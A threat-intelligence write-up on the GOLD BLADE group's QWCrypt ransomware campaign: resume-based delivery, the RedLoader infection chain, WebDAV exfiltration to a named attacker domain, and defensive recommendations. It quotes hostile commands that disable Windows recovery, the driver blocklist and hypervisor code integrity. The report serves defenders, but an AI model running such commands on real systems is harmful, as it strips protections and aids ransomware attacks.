GOLD BLADE’s QWCrypt: A New Era of Targeted Ransomware Attacks
The cyber threat landscape has witnessed a significant evolution with the emergence of the GOLD BLADE group, a sophisticated adversary that has transitioned from traditional espionage to a hybrid model combining data theft with targeted ransomware attacks. Central to this shift is their deployment of a custom ransomware tool known as QWCrypt, marking a new chapter in cyber extortion tactics.
From Espionage to Ransomware: The Evolution of GOLD BLADE
Historically, GOLD BLADE’s operations, tracked under the campaign identifier STAC6565, were primarily focused on espionage activities. Between early 2024 and mid-2025, the group targeted nearly 40 organizations, with a pronounced emphasis on Canadian entities spanning sectors such as services, manufacturing, retail, and technology.
In a strategic pivot, GOLD BLADE has now integrated ransomware into their arsenal, utilizing QWCrypt to encrypt critical data and demand ransoms. This evolution signifies a broader trend among cybercriminals who are diversifying their methods to maximize financial gain.
Sophisticated Delivery Mechanisms: Exploiting Trusted Platforms
GOLD BLADE’s approach to infiltrating target systems is notably sophisticated. Departing from conventional phishing tactics, the group exploits reputable recruitment platforms such as Indeed, JazzHR, ADP, and LinkedIn. They submit counterfeit resumes in PDF format, which either contain the initial stage of malware or redirect human resources personnel to deceptive Safe Resume Share portals designed to deliver malicious content.
This method is particularly insidious because it integrates seamlessly into standard hiring workflows, allowing the malicious resumes to bypass many email security filters undetected. The trust associated with these platforms further enhances the likelihood of successful infiltration.
The RedLoader Delivery Chain: A Multi-Stage Attack
Once a malicious resume is opened, it triggers a complex, multi-stage infection chain. The initial payload often includes a ZIP file containing a disguised PDF shortcut or an ISO image. Executing this file runs a renamed version of ADNotificationManager.exe, which sideloads a malicious RedLoader DLL (such as srvcli.dll or netutils.dll) via rundll32.exe from a WebDAV share hosted behind Cloudflare Workers.
The first-stage DLL establishes communication with the command-and-control (C2) server and sets up scheduled tasks that download subsequent payloads into the user’s AppData\Roaming directory, using innocuous names like BrowserEngineUpdate_. These tasks leverage legitimate Windows utilities, such as pcalua.exe, to execute the payloads, thereby minimizing the risk of detection.
A batch script then deploys Sysinternals AD Explorer to perform network reconnaissance, compresses the findings using 7-Zip, and uploads the data to attacker-controlled WebDAV servers, such as local.chronotypelabs[.]workers[.]dev.
QWCrypt Deployment: The Final Blow
When GOLD BLADE decides to deploy QWCrypt, they distribute an encrypted 7-Zip archive over SMB to multiple servers within the target network. A launcher script ensures that their Terminator-based anti-virus disabling service is active before proceeding to disable system recovery options and execute the QWCrypt locker with specific parameters:
“`
bcdedit /set {default} recoveryenabled no
qwc_537aab1c.exe -v -key
“`
The Terminator service utilizes a vulnerable Zemana AntiMalware driver (term.sys, later renamed) to terminate protected processes and weaken core Windows defenses by modifying critical registry values:
“`
HKLM\SYSTEM\CurrentControlSet\Control\CI\Config /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 0x0 /f
HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity /v Enabled /t REG_DWORD /d 0x0 /f
“`
A final cleanup script runs QWCrypt with hypervisor-specific flags where necessary, deletes shadow copies to prevent data recovery, and clears PowerShell history, leaving only encrypted data and a ransom note titled !!!how_to_unlock_qwCrypt_files.txt in its wake.
Data Exfiltration: A Dual Threat
Beyond encryption, GOLD BLADE employs data exfiltration tactics to enhance their extortion leverage. Stolen data is archived using 7-Zip and transmitted over WebDAV via Cloudflare Workers domains. This strategy ensures that even if the encryption process is thwarted or the victim refuses to pay the ransom, the attackers can still threaten to leak sensitive information, thereby increasing the pressure on the victim to comply with their demands.
Implications and Recommendations
The emergence of GOLD BLADE and their deployment of QWCrypt underscore the evolving nature of cyber threats, where adversaries blend traditional espionage with ransomware to maximize their impact. Organizations, particularly those in sectors targeted by GOLD BLADE, must adopt a proactive and multi-layered defense strategy to mitigate the risk of such sophisticated attacks.
Key Recommendations:
1. Enhanced Email Security: Implement advanced email filtering solutions capable of detecting and quarantining malicious attachments and links, even those originating from trusted platforms.
2. Employee Training: Conduct regular cybersecurity awareness training for employees, emphasizing the risks associated with opening unsolicited attachments and clicking on unknown links, even from seemingly legitimate sources.
3. Network Segmentation: Segment networks to limit lateral movement by attackers, thereby containing potential breaches and minimizing the impact on critical systems.
4. Regular Backups: Maintain up-to-date, offline backups of critical data to ensure recovery in the event of an attack, and regularly test backup restoration procedures.
5. Patch Management: Keep all systems and software updated with the latest security patches to close vulnerabilities that could be exploited by attackers.
6. Incident Response Planning: Develop and regularly update an incident response plan that includes procedures for dealing with ransomware attacks, including communication strategies and legal considerations.
By implementing these measures, organizations can enhance their resilience against the sophisticated tactics employed by groups like GOLD BLADE and better protect their critical assets from emerging cyber threats.
